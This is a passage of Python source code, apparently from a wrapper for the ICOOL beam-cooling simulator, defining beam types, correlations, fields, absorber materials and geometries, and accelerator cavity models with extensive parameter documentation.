'pos': 4, 'type': 'Real', 'doc': 'Twiss epsilon parameter [m]'}}},
'equal_sol': {
'desc': 'Equal time in solenoid.', 'doc': 'Set up with pz and σPz such that βz > βo. '
'Set up initial pt = 0. This correlation determines the pt '
'for a given pz that gives all the initial particles the same βo. '
'If parameter 3 is 0, the azimuthal angle is chosen randomly.',
'icool_model_name': 9,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'axial_beta': {
'pos': 2, 'type': 'Real', 'doc': 'desired axial beta (=v/c) value βo'},
'az_ang_mom': {
'pos': 3, 'type': 'Real', 'doc': 'azimuthal angle of transverse momentum [deg]'}}},
'balbekov': {
'desc': 'Balbekov version of amplitude-energy.',
'doc': '',
'icool_model_name': 10,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'eref': {
'pos': 2, 'type': 'Real', 'doc': 'Eref [GeV]'},
'babs': {
'pos': 3, 'type': 'Real', 'doc': 'Babs [ T ]'},
'sigma_e:': {
'pos': 4, 'type': 'Real', 'doc': 'σE [GeV]'}}},
'dispersion': {
'desc': 'Dispersion', 'doc': '',
'icool_model_name': 11,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'value': {
'pos': 2, 'type': 'Real', 'doc': '[m or rad]'},
'pref': {
'pos': 3, 'type': 'Real', 'doc': '[GeV/c]'},
'type': {
'pos': 4, 'type': 'Real', 'doc': 'Type flag. x, y, x_prime, y_prime'}}}}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return self.corrtyp + ':' + 'Correlation:' + \
ModeledCommandParameter.__str__(self)
class BeamType(Container):
"""
A BeamType is a:
(1) PARTNUM (I) particle number
(2) BMTYPE (I) beam type {magnitude = mass code; sign = charge}
1: e
2: μ
3: π
4: K
5: p
6: d
7: He3
8: Li7
(3) FRACBT (R) fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0
(4) Distribution
(5) NBCORR # of beam correlations {0-10}
(6) From 0-10 enclosed Correlation objects as specified by NBCORR (5)
"""
allowed_enclosed_commands = ['Correlation']
command_params = {
'partnum': {
'desc': 'Particle number',
'doc': '',
'type': 'Integer',
'req': True,
'default': None},
'bmtype': {
'desc': 'beam type {magnitude = mass code; sign = charge}: 1: e, 2: μ, 3: π, 4: K, 5: p. '
'6: d, 7: He3, 8: Li7',
'doc': '',
'out_dict': {
'e': 1,
'mu': 2,
'pi': 3,
'k': 4,
'p': 5,
'd': 6,
'he3': 7,
'li7': 8},
'type': 'Integer',
'req': True,
'default': None},
'fractbt': {
'desc': 'Fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0',
'doc': '',
'type': 'Real',
'req': True,
'default': None},
'distribution': {
'desc': 'Beam distribution object',
'doc': '',
'type': 'Distribution',
'req': True,
'default': None},
'nbcorr': {
'desc': '# of beam correlations {0-10}',
'doc': '',
'type': 'Integer',
'req': True,
'default': 0,
'min': 0,
'max': 10}}
def __init__(self, **kwargs):
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return 'BeamType: \n'
def __repr__(self):
return '[BeamType: ]'
def gen_for001(self, file):
file.write(str(self.partnum))
file.write(' ')
file.write(str(self.bmtype))
file.write(' ')
file.write(str(self.fractbt))
file.write('\n')
self.distribution.gen_for001(file)
file.write('\n')
file.write(str(self.nbcorr))
file.write('\n')
for c in self.enclosed_commands:
c.gen_for001(file)
class Field(ModeledCommandParameter):
"""
A Field is a:
FTAG - A tag identifying the field. Valid FTAGS are:
NONE, ACCEL, BLOCK, BROD, BSOL, COIL, DIP, EFLD, FOFO, HDIP, HELI(
X), HORN, KICK, QUAD,
ROD, SEX, SHEE(T), SOL, SQUA, STUS, WIG
FPARM - 15 parameters describing the field. The first parameter is the model.
"""
def __init__(self, ftag, kwargs):
ModeledCommandParameter.__init__(self, kwargs)
self.ftag = ftag
def __call__(self, kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'fparm':
object.__setattr__(self, name, value)
else:
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return self.ftag + ':' + 'Field:' + \
ModeledCommandParameter.__str__(self)
def gen_fparm(self):
self.fparm = [0] * 10
cur_model = self.get_model_dict(self.model)
for key in cur_model:
pos = int(cur_model[key]['pos']) - 1
if key == self.get_model_descriptor_name():
val = self.get_icool_model_name()
else:
val = getattr(self, key)
self.fparm[pos] = val
print self.fparm
class Material(ModeledCommandParameter):
"""
A Material is a:
(1) MTAG (A) material composition tag
(2) MGEOM (A) material geometry tag
(3-12) GPARM (R) 10 parameters that describe the geometry of the material
Enter MTAG in upper case.
Valid MTAG'S are:
VAC vacuum (i.e., no material)
GH gaseous hydrogen
GHE gaseous helium
LH liquid hydrogen
LHE liquid helium
LI BE B C AL TI FE CU W HG PB (elements)
LIH lithium hydride
CH2 polyethylene
SS stainless steel (alloy 304)
Valid MGEOM's are:
NONE use for vacuum
10*0.
CBLOCK cylindrical block
10*0.
...
"""
materials = {
'VAC': {'desc': 'Vacuum (no material)', 'icool_material_name': ''},
'GH': {'desc': 'Gaseous hydrogen'},
'GHE': {'desc': 'Gaseous helium'},
'LH': {'desc': 'Liquid hydrogen'},
'LHE': {'desc': 'Liquid helium'},
'LI': {'desc': 'Lithium'},
'BE': {'desc': 'Berylliyum'},
'B': {'desc': 'Boron'},
'C': {'desc': 'Carbon'},
'AL': {'desc': 'Aluminum'},
'TI': {'desc': 'Titanium'},
'FE': {'desc': 'Iron'},
'CU': {'desc': 'Copper'},
'W': {'desc': 'Tungsten'},
'HG': {'desc:': 'Mercury'},
'PB': {'desc:': 'Lead'}
}
models = {
'model_descriptor': {
'desc': 'Geometry',
'name': 'geom',
'num_parms': 12,
'for001_format': {
'line_splits': [1, 1, 10]}},
'VAC': {
'desc': 'Vacuum',
'doc': 'Vacuum region. Specify vacuum for mtag. Geom will be set to NONE.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''}}},
'CBLOCK': {
'desc': 'Cylindrical block',
'doc': 'Cylindrical block',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''}}},
'ASPW': {
'desc': 'Azimuthally Symmetric Polynomial Wedge absorber region', 'doc': 'Edge shape given by '
'r(dz) = a0 + a1*dz + a2*dz^2 + a3*dz^3 in the 1st quadrant and '
'where dz is measured from the wedge center. '
'1 z position of wedge center in region [m] '
'2 z offset from wedge center to edge of absorber [m] '
'3 a0 [m] '
'4 a1 '
'5 a2 [m^(-1)] '
'6 a3 [m^(-2)]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zpos': {
'pos': 3, 'type': 'Real', 'doc': ''},
'zoff': {
'pos': 4, 'type': 'Real', 'doc': ''},
'a0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'a1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'a2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'a3': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'ASRW': {
'desc': 'Azimuthally Symmetric Polynomial Wedge absorber region',
'doc': 'Edge shape given by '
'r(dz) = a0 + a1*dz + a2*dz^2 + a3*dz^3 in the 1st quadrant and '
'where dz is measured from the wedge center. '
'1 z position of wedge center in region [m] '
'2 z offset from wedge center to edge of absorber [m] '
'3 a0 [m] '
'4 a1 '
'5 a2 [m^(-1)] '
'6 a3 [m^(-2)]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zpos': {
'pos': 3, 'type': 'Real', 'doc': ''},
'zoff': {
'pos': 4, 'type': 'Real', 'doc': ''},
'a0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'a1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'a2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'a3': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'HWIN': {
'desc': 'Hemispherical absorber end region',
'doc': '1 end flag {-1: entrance, +1: exit} '
'2 inner radius of window[m] '
'3 window thickness [m] '
'4 axial offset of center of spherical window from start of end region [m]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'end_flag': {
'pos': 3, 'type': 'Real', 'doc': '1 end flag {-1: entrance, +1: exit} '},
'in_rad': {
'pos': 4, 'type': 'Real', 'doc': 'Inner radius of window'},
'thick': {
'pos': 5, 'type': 'Real', 'doc': 'Thickness of window'},
'offset': {
'pos': 6, 'type': 'Real', 'doc': 'Axial offset of center of spherical '
'window from start of end region [m]'}}},
'NIA': {
'desc': 'Non-isosceles absorber',
'doc': '1 zV distance of wedge “center” from start of region [m] '
'2 z0 distance from center to left edge [m] '
'3 z1 distance from center to right edge [m] '
'4 θ0 polar angle from vertex of left edge [deg] '
'5 φ0 azimuthal angle of left face [deg] '
'6 θ1 polar angle from vertex of right edge [deg] '
'7 φ1 azimuthal angle of right face [deg]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zv': {
'pos': 3, 'type': 'Real', 'doc': 'Distance of wedge “center” from start of region [m]'},
'z0': {
'pos': 4, 'type': 'Real', 'doc': 'Distance from center to left edge [m] '},
'z1': {
'pos': 5, 'type': 'Real', 'doc': 'Distance from center to right edge [m]}'},
'θ0': {
'pos': 6, 'type': 'Real', 'doc': 'Polar angle from vertex of left edge [deg]'},
'φ0': {
'pos': 7, 'type': 'Real', 'doc': 'Azimuthal angle of left face [deg]'},
'θ1': {
'pos': 8, 'type': 'Real', 'doc': 'Polar angle from vertex of right edge [deg] '},
'φ1': {
'pos': 9, 'type': 'Real', 'doc': 'Azimuthal angle of right face [deg]'}}},
'PWEDGE': {
'desc': 'Asymmetric polynomial wedge absorber region',
'doc': 'Imagine the wedge lying with its narrow end along the x axis. The wedge is symmetric about the '
'x-y plane. The edge shape is given by dz(x) = a0 + a1*x + a2*x^2 + a3*x^3 '
'where dz is measured from the x axis.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'init_vertex': {
'pos': 3, 'type': 'Real', 'doc': 'Initial position of the vertex along the x axis [m]'},
'z_wedge_vertex': {
'pos': 4, 'type': 'Real', 'doc': 'z position of wedge vertex [m] '},
'az': {
'pos': 5, 'type': 'Real', 'doc': 'Azimuthal angle of vector pointing to vertex in plane of wedge w.r.t. +ve x-axis [deg]'},
'width': {
'pos': 6, 'type': 'Real', 'doc': 'Total width of wedge in dispersion direction [m]'},
'height': {
'pos': 7, 'type': 'Real', 'doc': 'Total height of wedge in non-dispersion direction [m]'},
'a0': {
'pos': 8, 'type': 'Real', 'doc': 'Polar angle from vertex of right edge [deg] '},
'a1': {
'pos': 9, 'type': 'Real', 'doc': 'Azimuthal angle of right face [deg]'},
'a2': {
'pos': 10, 'type': 'Real', 'doc': 'Polar angle from vertex of right edge [deg] '},
'a3': {
'pos': 11, 'type': 'Real', 'doc': 'Azimuthal angle of right face [deg]'}}},
'RING': {
'desc': 'Annular ring of material',
'doc': 'This is functionally equivalent to defining a region with two radial subregions, the first of '
'which has vacuum as the material type. However, the boundary crossing algorithm used for RING is '
'more sophisticated and should give more accurate simulations.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'inner': {
'pos': 3, 'type': 'Real', 'doc': 'Inner radius (R) [m]'},
'outer': {
'pos': 4, 'type': 'Real', 'doc': 'Outer radius (R) [m]'}}},
'WEDGE': {
'desc': 'Asymmetric wedge absorber region',
'doc': 'We begin with an isosceles triangle, sitting on its base, vertex at the top. '
'The base-to-vertex distance is W. The full opening angle at the vertex is A. Using '
'two of these triangles as sides, we construct a prism-shaped wedge. The distance from '
'one triangular side to the other is H. The shape and size of the wedge are now established. '
'We define the vertex line of the wedge to be the line connecting the vertices of its two '
'triangular sides. Next, we place the wedge in the right-handed ICOOL coordinate system. '
'The beam travels in the +Z direction. Looking downstream along the beamline (+Z into the page), '
'+X is horizontal and to the left, and +Y is up. Assume the initial position of the wedge is as '
'follows: The vertex line of the wedge is vertical and lies along the Y axis, extending from Y = -H/2 '
'to Y = +H/2. The wedge extends to the right in the direction of -X, such that it is symmetric about '
"the XY plane. (Note that it is also symmetric about the XZ plane.) From the beam's point of view, "
'particles passing on the +X side of the Y axis will not encounter the wedge, while particles passing '
'on the -X side of the Y axis see a rectangle of height H and width W, centered in the Y direction, with '
'Z thickness proportional to -X. '
'By setting parameter U to a non-zero value, the user may specify that the wedge is to be '
'translated in the X direction. If U>0, the wedge is moved (without rotation) in the +X direction. '
'For example, if U = W/2, then the wedge is centered in the X direction; its vertex is at X = W/2 '
'and its base is at X = -W/2. Note that the wedge is still symmetric about both the XY plane and '
'the XZ plane. '
'Next, the wedge may be rotated about the Z axis by angle PHI. Looking downstream in the beam '
'direction, positive rotations are clockwise and negative rotations are counter-clockwise. For '
'example, setting PHI to 90 degrees rotates the wedge about the Z axis so that its vertex line is '
'parallel to the X axis and on top, while its base is parallel to the XZ plane and at the bottom. In '
'general this rotation breaks the symmetry about the XZ plane, but the symmetry about the XY '
'plane is maintained. '
'Finally, the wedge is translated in the Z direction by a distance Zv, so that its XY symmetry plane '
'lies a distance Zv downstream of the start of the region. Usually Zv should be at least large '
'enough so that the entire volume of the wedge lies within its region, i.e. Zv .ge. W tan (A/2), the '
'maximum Z half-thickness of the wedge. As well, the region usually should be long enough to '
'contain the entire volume of the wedge, i.e. RegionLength .ge. Zv + W tan (A/2). Wedges that do '
'lie completely within their region retain their symmetry about the XY plane Z=Zv. '
'If portions of a wedge lie outside their region in Z, then the volume of the wedge lying outside '
'the region is ignored when propagating particles through the wedge. Such a wedge will grow in '
'thickness until it reaches the region boundary, but will not extend beyond it. In such cases, '
'wedges may lose their symmetry about the XY plane Z=Zv.'
'Wedges may be defined such that they extend outside the radial boundaries of the radial '
'subregion within which they are defined. However, any portion of the wedge volume lying inside the inner '
'radial boundary or outside the outer radial boundary is ignored when propagating particles through '
'the wedge. For example, if the user intends that an entire radial subregion of circular cross-section be '
'filled with a wedge, then it is clear that the corners of the wedge must extend outside the radial region, '
"but particles passing outside the wedge's radial subregion will not see the wedge at all. "
'In short, we may say that although it is permitted (and sometimes essential) to define a wedge to '
'be larger than its subregion, for the purposes of particle propagation the wedge is always trimmed at the '
"region's Z boundaries and the subregion's radial boundaries. Any volume within the region and subregion "
'that is not occupied by the material specified for the wedge is assumed to be vacuum.'
'------------------------------------------------------------------------------------------------------------'
'Example 1: Within a region 0.4 meters long in Z, within a radial subregion extending from the Z axis out '
'to a radius of 0.3 meters, a wedge is to fill the X<0 (right) half of the 0.3 meter aperture of the '
'subregion, and increase in Z thickness proportional to -X, such that it is 0.2 meters thick at the '
'rightmost point in the subregion (X=-0.3, Y=0). The wedge is to be 0.2 meters thick at a point 0.3 '
'meters from its vertex. The half-thickness is 0.1 meters, the half-opening angle is '
'atan (0.1/0.3) = 18.4 degrees, so the full opening angle of the wedge A is 36.8 degrees. The width '
'(X extent) of the wedge must be 0.3 meters, and the height (Y extent) of the wedge must be 0.6 meters. '
'Two corners of the wedge extend well beyond the subregion, but they will be ignored during particle '
'propagation. The wedge does not need to be translated in X (U = 0) nor does it need to be rotated '
'about the Z axis (PHI = 0). For convenience we center the wedge (in Z) within its region, '
'so Zv = 0.2 meters. Since the maximum half-thickness of the wedge is only 0.1 meters, the wedge '
'does not extend beyond (or even up to) the Z boundaries of the region. The volume within the region '
'and subregion but outside the wedge is assumed to be vacuum.'
'------------------------------------------------------------------------------------------------------------'
'Example 2: In the same region and subregion, we need a wedge with the same opening angle, '
'but filling the entire aperture of the subregion, thickness gradient in the +Y direction, thickness = '
'0 at the lowest point in the subregion (X=0, Y=-0.3).'
'The wedge must now have H = W = 0.6 meters so it can fill the entire aperture of the subregion.'
'From its initial position, it must first be translated 0.3 meters in the +X direction (U = 0.3) to '
"center it in the subregion's aperture, and then (from the perspective of someone looking "
'downstream along the beam) rotated counterclockwise 90 degrees (PHI = -90.) so that the Z '
'thickness increases proportionally to +Y. Since the wedge has the same opening angle as before '
'but has twice the width, its maximum Z thickness is now 0.4 meters, just barely fitting between '
'the Z boundaries of the region if Zv = 0.2 meters. All four corners of the wedge now extend '
"outside the radial subregion's outer boundary, but they will be ignored during particle "
'propagation.” {S.B.}'
'The wedge geometry can accept a second MTAG parameter in the SREGION construct. The first material '
'refers to the interior of the wedge. The second material, if present, refers to the exterior of the wedge. '
'If a second MTAG parameter is not present, vacuum is assumed.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'vert_ang': {
'pos': 3, 'type': 'Real', 'doc': 'Full angle at vertex, α (or A) [degrees]the x axis [m]'},
'vert_init': {
'pos': 4, 'type': 'Real', 'doc': 'Initial position of the vertex along the x axis, U [m]'},
'vert_z': {
'pos': 5, 'type': 'Real', 'doc': 'Z position of wedge vertex, Zv [m]'},
'vert_az': {
'pos': 6, 'type': 'Real', 'doc': 'azimuthal angle φ of vector pointing to vertex in plane of wedge w.r.t. +ve x-axis [deg]'},
'width': {
'pos': 7, 'type': 'Real', 'doc': 'Total width of wedge in dispersion direction, w [m]'},
'height': {
'pos': 8, 'type': 'Real', 'doc': 'Total height of wedge in non-dispersion direction, h [m]'}}}}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __setattr__(self, name, value):
if name == 'mparm':
object.__setattr__(self, name, value)
else:
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return 'Material:' + ModeledCommandParameter.__str__(self)
def gen_mparm(self):
self.mparm = [0] * 12
cur_model = self.get_model_dict(self.geom)
for key in cur_model:
pos = int(cur_model[key]['pos']) - 1
val = getattr(self, key)
self.mparm[pos] = val
print self.mparm
def gen(self, file):
file.write('\n')
file.write(self.mtag)
file.write('\n')
file.write(self.mgeom)
file.write('\n')
for s in mparm:
file.write(s)
file.write(" ")
class NoField(Field):
"""No Field"""
begtag = 'NONE'
endtag = ''
models = {
'model_descriptor': {'desc': 'Name of model parameter descriptor',
'name': None,
'num_parms': 15,
'for001_format': {'line_splits': [15]}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'NONE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'NONE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
# return Field.__str__(self)
return 'NONE'
def gen_fparm(self):
Field.gen_fparm(self)
class Accel(Field):
"""ACCE(L) linear accelerator fields
1 Model
1: EZ only with no transverse variation
2: cylindrical TM01p pillbox resonator
3: traveling wave cavity
4: approximate fields for symmetric circular-nosed cavity
5: user-supplied azimuthally-symmetric TM mode (SuperFish) RF field
6: induction linac model - waveform from user-supplied polynomial coefficients
7: induction linac model - internally generated waveform
8: induction linac model - waveform from user-supplied file
9: sector-shaped pillbox cavity (circular cross section)
10: variable {frequency, gradient} pillbox cavity
11: straight pillbox or SuperFish cavity in dipole region
12: sector-shaped pillbox cavity (rectangular cross section)
13: open cell standing wave cavity
The initial phase parameter can be used for any PHASEMODEL and ACCEL models 1-5.
For model = 1
2 frequency [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}
5 parameter to approximate a rectangular cavity in cylindrical geometry.
if set to radius of curvature rho, then E_z is scaled by 1-x/rho, where x is the horizontal
distance from the reference circle.
6 (not used)
7 (not used)
8 mode
0 : time-independent
1: sinusoidal time variation
For model = 2
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 parameter to approximate a rectangular cavity in cylindrical geometry; if set to radius of
curvature rho, then the field components are scaled by 1-x/rho, where x is the horizontal
distance from the reference circle.
6 x offset of cavity [m]
7 y offset of cavity [m]
8 longitudinal mode p {0,1}
For mode = 0 Rcav = 0.383 * lambda
For mode = 1 Rcav = 2.405 / {(2pi f)^2 - (pi/SLEN)^2)}^(1/2)
For model = 3
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 (not used)
6 (not used)
7 (not used)
8 phase velocity of RF wave B_omega. {0<B_omega<1}
For model = 4
2 frequency [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 (not used)
6 (not used)
7 (not used)
8 total length of cavity [m]
9 total gap [m]
10 radius of drift tube [m]
11 radius of nose piece [m]
For model = 5
2 frequency[MHz]
4 phase shift [deg] {0-360}.
8 file ## of azimuthally symmetric RF input file (see below) {20-99}
9 field strength normalization factor [MV/m] This multiplies the value in the SuperFish file.
10 radial cutoff for cavity [m]
11 axial distance from start of region to centerline of cavity [m]
12 axial symmetry through center of cavity
0: symmetric
1: not symmetric
##.DAT has the same format as the Parmela output of
The contents of the user-supplied file FOR0
the SuperFish postprocessor SF07.
1.1 zmin Start of axial grid [cm]
1.2 zmax End of axial grid [cm]
1.3 Nz # of z grid points {<251}
2 frequency [MHz]
3.1 rmin Start of radial grid [cm]
3.2 rmax End of radial grid [cm]
3.3 Nr # of r grid points {<151}
for ir=1,Nr
for iz=1,Nz
4.1 Ez axial electric field [MV/m]
4.2 Er radial electric field [MV/m]
4.3 E magnitude of electric field [MV/m]
4.4 Hphi azimuthal magnetic field [A/m]
next iz
next ir
The grids should extend beyond the region where tracking will occur.
For model = 6
2 time offset from start of voltage pulse[s]
3 accelerator gap [m]
4 time reset parameter (see below)
5 V0 term in polynomial expansion of voltage pulse [V ]
6 V1 term in polynomial expansion of voltage pulse [V / mu_ss]
7 V2 term in polynomial expansion of voltage pulse [V / mu_s^2]
8 V3 term in polynomial expansion of voltage pulse [V / mu_s^3]
9 V4 term in polynomial expansion of voltage pulse [V / mu_s^4]
10 V5 term in polynomial expansion of voltage pulse[V / mu_s^5]
11 V6 term in polynomial expansion of voltage pulse[V / mu_s^6]
12 V7 term in polynomial expansion of voltage pulse[V / mu_s^7]
13 V8 term in polynomial expansion of voltage pulse[V / mu_s^8]
This model generates an EZ field across the accelerator gap. The field is time
dependent, but does not depend on z or r. The radial electric field and azimuthal
magnetic fields are assumed to be negligible. When the time reset parameter is 1,
the start time for the voltage pulse is determined from the time the reference particle
#2 above. Subsequent cells
entered the cell. The user can adjust this time using parameter
#4 set to 0 to sample later portions of the same voltage pulse.
should use parameter
#4 back to 1.
A new pulse shape can be started at any time by setting parameter
For model = 7
2 number of gaps
3 starting voltage [GV]
4 voltage swing [GV]
5 time offset [s]
6 target kinetic energy [GeV]
7 pulse duration [s]
8 parameter to adjust slope at end of voltage pulse
9 number of bins in voltage pulse
10 gap length [m]
# of output diagnostic file {20-99} (Set this <20 for no diagnostic
# output.)
11 file
12 kill particle flag (Set=1 to eliminate non-useful particles)
13 restart flag (Set =1 to restart calculation)
This model, based on a routine by Charles Kim, uses the local E-t phase space to create a voltage
waveform that attempts to flatten out the kinetic energy along the pulse. The diagnostic file contains
the following information:
Region number
Time bin, n
t(n)
V(n)
EK(n)
wt1(n) total event weight in this bin
wt2(n) event weight inside the chosen energy range
sigEK(n)
Vstart
Vend
For model = 8
2 time offset from start of voltage pulse[s]
3 accelerator gap [m]
4 time reset parameter [s](see below)
5 file number of waveform input (see format below) {20-99}
6 polynomial interpolation order, 1=> linear, 2=>quadratic, etc. {1-3}
7 file # for output diagnostic file (see format below){20-99}
8 time increment between diagnostic outputs to file [s]
This model generates an EZ field across the accelerator gap. The field is time
dependent, but does not depend on z or r. The radial electric field and azimuthal
magnetic fields are assumed to be negligible. The gap parameter is used to convert
the voltage profile into an electric field. The field is applied everywhere in the region.
When the time reset parameter is 1, the start time for the voltage pulse is determined
from the time the reference particle entered the cell. The user can adjust this time using
# 2 above. Subsequent cells can use parameter #4 set to 0 to sample later
# portions of
parameter
#4
the same voltage pulse. A new pulse shape can be started at any time by setting parameter
back to 1.
The contents of the waveform input file FOR0##.DAT is
1) number of points N {1-100}
This is followed by N pairs
2) t(i) V(i) [s] [V]
An output diagnostic file is initialized for an induction linac region where the time reset
parameter=1 and parameter 7 above is in the range {20-99}. Output occurs when the elapsed
time from the previous output exceeds the increment given in parameter 8. Output continues for
subsequent induction linac regions provided parameter 7 remains in the specified range. The
contents of the file are
1) column id header
2) region particle z t Ez
For model = 9
2 frequency f[MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
For model = 10
2 (not used)
3 (not used)
4 phase shift [deg] {0-360}.
5 number of wavelengths separating the two reference particles
6 reset parameter (see below)
7 Total length L of buncher [m]
8 g0 [MV/m]
9 g1 [MV/m]
10 g2 [MV/m]
11 (not used)
12 phase model
0: 0-crossing time set by tREFP
1: 0-crossing time set by (1/2) * (tREFP + t REF2)
This model uses a TM010 mode pillbox cavity. It can only be used with REFP and REF2
defined and phasemodel=2,3,4. The cavity frequency is set using the number of wavelengths
(parameter 5) and the time difference between the two reference particles. When the reset
parameter is 1, the starting location of the buncher is determined from the current position
#6 set to 0 to
of the reference particle. Subsequent ACCEL commands should use parameter
sample later portions of the gradient waveform, which is given by
G = g0 + g1*(z/L) + g2*(z/L)^2
#6 back to 1.
A new pulse shape can be started at any time by setting parameter
For model = 11
2 frequency f [MHz]
3 gradient on-axis at center of gap for a pillbox cavity [MV/m]
4 phase shift [deg] {0-360}.
5 radial offset of center of cavity from reference trajectory [m]
6 axial length of cavity [m] If this entered as 0, the program computes the largest pillbox
cavity that fits in the sector shaped region
7 cavity type
0: pillbox
1: SuperFish
## of azimuthally symmetric SuperFish RF input file (see model 5) {20-99}
8 file
9 SuperFish field normalization [MV/m] This multiplies the value in the SuperFish file.
10 SuperFish radial cut off [m]
11 axial displacement of center of SuperFish cavity from start of the region [m]
12 SuperFish axial symmetry
0: symmetric
1: not symmetric
For model = 12
2 frequency f[MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 radial offset of center of cavity from reference trajectory [m]
6 cavity width [m]
7 cavity height [m]
For model = 13
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 flag for hard edge focusing
0: both entrance and exit focusing
1: exit focusing only
2: entrance focusing only
3: no edge focusing
"""
begtag = 'ACCEL'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 15,
'for001_format': {
'line_splits': [15]}},
'ez': {
'desc': 'Ez only with no transverse variation',
'doc': '',
'icool_model_name': 1,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': 'Frequency [MHz]'},
'grad': {
'pos': 3, 'type': 'Real', 'doc': 'Gradient on-axis at center of gap [MV/m]'},
'phase': {
'pos': 4, 'type': 'Real', 'doc': 'Phase shift [deg] {0-360}.'},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': 'Parameter to approximate a rectangular cavity '
'in cylindrical geometry; if set to radius of curvature ρ, then EZ is scaled by '
'1-x/ ρ, where x is the horizontal distance from the reference circle.'},
'mode': {
'pos': 8, 'type': 'Int', 'doc': '0 : Time-independent 1: sinusoidal time variation'}}},
'cyn_pill': {
'desc': 'Cylindrical TM01p pillbox',
'doc': '', 'icool_model_name': 2,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': ''},
'longitudinal_mode': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'trav': {
'desc': 'Traveling wave cavity',
'doc': '',
'icool_model_name': 3,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': ''},
'x_offset': {
'pos': 6, 'type': 'Real', 'doc': ''},
'y_offset': {
'pos': 7, 'type': 'Real', 'doc': ''},
'phase_velocity': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'circ_nose': {
'desc': 'Approximate fields for symmetric circular-nosed cavity',
'doc': '',
'icool_model_name': 4,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'length': {
'pos': 8, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 9, 'type': 'Real', 'doc': ''},
'drift_tube_radius': {
'pos': 10, 'type': 'Real', 'doc': ''},
'nose_radius': {
'pos': 11, 'type': 'Real', 'doc': ''}}},
'az_tm': {
'desc': 'User-supplied azimuthally-symmetric TM mode (SuperFish)',
'doc': '', 'icool_model_name': 5,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
